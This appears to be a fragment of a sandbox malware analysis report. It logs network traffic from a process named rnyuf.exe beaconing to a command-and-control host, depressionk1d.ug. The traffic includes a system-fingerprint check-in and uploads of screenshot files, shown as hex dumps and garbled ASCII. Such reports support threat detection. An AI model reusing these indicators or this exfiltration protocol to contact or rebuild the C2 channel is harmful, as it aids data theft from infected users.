                          Nov 12, 2021 22:23:41.431687117 CET6178OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:41.431709051 CET6184OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:41.454235077 CET6196OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:41.454320908 CET6220OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:41.454423904 CET6233OUTData Raw: d4 a1 a8 e6 1f 21 29 6a 4d d5 16 ea 03 52 e6 1f 29 30 6a 5c d4 21 a9 db a9 dc 5c a4 a0 d3 b3 50 86 a5 0d 4e e4 f2 92 83 4b 9a 8c 1a 5c d3 15 87 e6 8c d3 01 a5 cd 02 b0 ea 50 69 99 cd 00 d0 16 24 a3 34 cc d1 9c 77 a7 71 58 92 97 35 16 f1 47 99 e9
                          Data Ascii: !)jMR)0j\!\PNK\Pi$4wqX5G@rf5.R}oM-OQ4fr44nN&`xb>:jwccTFj\bjbyl7sPmc@-T "msx-8Ya>AHMsGNT
                          Nov 12, 2021 22:23:41.503694057 CET6256INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          107192.168.2.449892178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.479825020 CET6255OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.510098934 CET6256INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          108192.168.2.449893178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.654845953 CET6257OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.679896116 CET6258INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          109192.168.2.449894178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.825675011 CET6258OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.851300001 CET6259INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:41.907788992 CET6259OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:41.907869101 CET6259OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:41.908065081 CET6269OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:41.908160925 CET6272OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:41.932033062 CET6277OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:41.932398081 CET6283OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:41.932651997 CET6288OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:41.932670116 CET6298OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:41.957333088 CET6310OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:41.957389116 CET6327OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:23:41.957421064 CET6341OUTData Raw: 23 55 39 3d c7 8e b4 f1 c1 a6 03 c5 2e 6a 6c 5a 64 81 b9 a7 a9 cd 43 de a4 5a 96 8d 22 c9 29 c3 a5 34 52 d4 b3 64 c9 01 c0 a7 83 51 03 4f 0c 2a 19 69 92 66 9c 2a 2d d4 a1 8d 4b 46 89 93 8a 5c d4 60 9a 77 6e 4e 2a 5a 34 4c 90 1c 53 81 15 01 92 25
                          Data Ascii: #U9=.jlZdCZ")4RdQO*if*-KF\`wnN*Z4LS%(iZEP~#{!Ht}+<v?io\_@BQo[uf% XkWEWkVK1iS<z%[W099 w'x`|>svO<c8<?Q}[Ya
                          Nov 12, 2021 22:23:42.005182981 CET6367INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          11192.168.2.449792178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:14.296639919 CET1799OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:14.296825886 CET1800OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:14.297132969 CET1810OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:14.297383070 CET1812OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:14.319067001 CET1814INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:14 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:14.319880962 CET1822OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:14.319940090 CET1832OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:14.319956064 CET1836OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:14.342485905 CET1847OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:14.342539072 CET1863OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:23:14.342564106 CET1864OUTData Raw: 00 19 a7 03 49 40 14 08 75 38 0a 60 a7 0a 04 c7 52 8a 4e d4 53 24 75 14 50 28 10 b4 52 d1 8a 62 16 94 51 4a 28 25 8b 40 eb 45 39 7a d3 11 b3 e1 e1 fe 99 29 f4 8c ff 00 2a a0 7e f1 fa d6 87 87 87 fa 4c df f5 cc ff 00 23 59 e7 ab 7d 6b 9e 3f c5 90
                          Data Ascii: I@u8`RNS$uP(RbQJ(%@E9z)*~L#Y}k?ElsJ)ZZhTXK@RR!iE%(HCSQ&%tZ46IOy32~~"J^Wa!_G7i7:1Rg:C
                          Nov 12, 2021 22:23:14.342580080 CET1868OUTData Raw: 85 a7 53 69 d4 c9 14 74 a0 51 40 a0 4c 70 a5 a4 14 b4 f5 24 29 47 5a 29 28 01 f4 e1 4c 14 f1 4c 86 6e 78 74 13 35 c1 f4 8c ff 00 23 59 9f c4 6b 5b c3 43 2d 76 7d 23 fe 86 b2 bf 88 fd 6b 9a 9f f1 65 f2 2e b2 fd dc 45 a4 14 52 d6 e7 28 52 d0 28 a0
                          Data Ascii: SitQ@Lp$)GZ)(LLnxt5#Yk[C-v}#ke.ER(R(BR1ii(BIKHS)$u)Zu4Rb0q]&YN5MBgUTb}I5Ziv_^)sgKv_Y`Uyc5?)RO`[)+$!


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          110192.168.2.449895178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.979407072 CET6351OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.004497051 CET6367INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
